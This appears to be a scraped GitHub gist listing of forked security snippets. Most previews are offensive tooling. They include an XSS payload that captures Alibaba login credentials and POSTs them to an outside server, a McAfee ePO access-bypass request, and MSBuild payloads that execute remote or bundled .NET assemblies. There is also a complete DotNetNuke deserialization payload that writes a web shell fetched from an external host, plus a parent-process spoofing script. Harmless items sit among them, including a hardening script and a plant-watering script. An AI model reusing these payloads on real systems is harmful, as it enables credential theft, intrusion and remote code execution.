unbaiat unbaiat
unbaiat
/ Alibaba-final-xss-payload.js
Created
April 15, 2019 07:40
— forked from Voorivex/Alibaba-final-xss-payload.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.forms[0].onsubmit = function() { | |
| var u = document.getElementById('fm-login-id'); | |
| var p = document.getElementById('fm-login-password'); | |
| var s = new XMLHttpRequets(); | |
| s.open('POST', 'https://myserver/xxx-alibaba/'); | |
| s.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); | |
| s.onreadystatechange = function() { | |
| if (s.readState == 4) { | |
| document.forms[0].submit(); | |
| } |
unbaiat
/ cve-2018-6671.txt
Created
March 8, 2019 14:12
— forked from leonjza/cve-2018-6671.txt
cve-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass | |
| # Specifying an X-Forwarded-For header bypasses the local only check | |
| # https://kc.mcafee.com/corporate/index?page=content&id=SB10240 | |
| # https://nvd.nist.gov/vuln/detail/CVE-2018-6671 | |
| # | |
| # 2019 @leonjza | |
| # | |
| # Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850 | |
| POST /Notifications/testRegExe.do HTTP/1.1 |
unbaiat
/ Get-KerberosKeytab.ps1
Last active
February 18, 2019 08:21
— forked from 0xhexmex/Get-KerberosKeytab.ps1
Parses Kerberos Keytab files
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param( | |
| [Parameter(Mandatory)] | |
| [string]$Path | |
| ) | |
| #Created by [email protected] | |
| # | |
| #Got keytab structure from http://www.ioplex.com/utilities/keytab.txt | |
| # | |
| # keytab { |
unbaiat
/ msBuildDemo.xml
Created
November 28, 2018 05:30
— forked from G0ldenGunSec/msBuildDemo.xml
MSBuild payload used to execute a remotely-hosted .net assembly
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="DemoClass"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <Task> | |
| <Code Type="Class" Language="cs"> |
unbaiat
/ findsubdomains.py
Created
November 22, 2018 14:38
— forked from PaulSec/findsubdomains.py
Python utility for https://findsubdomains.com/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| from bs4 import BeautifulSoup | |
| import json | |
| import re | |
| def sanitize_data(data): | |
| return data.replace('\r\n', '').replace('\n', '').replace(' ', '').replace(' ', '') | |
| if len(sys.argv) < 2: |
unbaiat
/ DotNetNuke CVE-2017-9822 PoC
Created
November 9, 2018 05:41
— forked from GlitchWitch/DotNetNuke CVE-2017-9822 PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DNNPersonalization=<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils], [System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>PullFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">http://ctf.pwntester.com/shell.aspx</anyType><anyType xsi:type="xsd:string">C:\inetpub\wwwroot\dotnetnuke\shell.aspx</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>;language=en-us |
unbaiat
/ windows_hardening.cmd
Created
October 28, 2018 20:19
— forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: | |
| ::####################################################################### | |
| :: | |
| :: Change file associations to protect against common ransomware attacks | |
| :: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell | |
| :: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :) | |
| :: --------------------- | |
| ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
| ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
| ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" |
unbaiat
/ msbuild_ghostpack_seatbelt.txt
Created
October 28, 2018 07:03
— forked from curi0usJack/msbuild_ghostpack_seatbelt.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="NotSubTee"> | |
| <BusinessTime /> | |
| </Target> | |
| <UsingTask | |
| TaskName="BusinessTime" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <ParameterGroup/> | |
| <Task> |
unbaiat
/ GetSystem.ps1
Created
May 17, 2018 10:10
PowerShell GetSystem => Test for MITRE ATT&CK T 1134
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| $owners = @{} | |
| gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user} | |
| get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}} | |
| #> | |
| #Simple powershell/C# to spawn a process under a different parent process | |
| #Launch PowerShell As Administrator |
unbaiat
/ water.py
Created
May 7, 2018 13:45
— forked from benrules2/water.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # External module imp | |
| import RPi.GPIO as GPIO | |
| import datetime | |
| import time | |
| init = False | |
| GPIO.setmode(GPIO.BOARD) # Broadcom pin-numbering scheme | |
| def get_last_watered(): |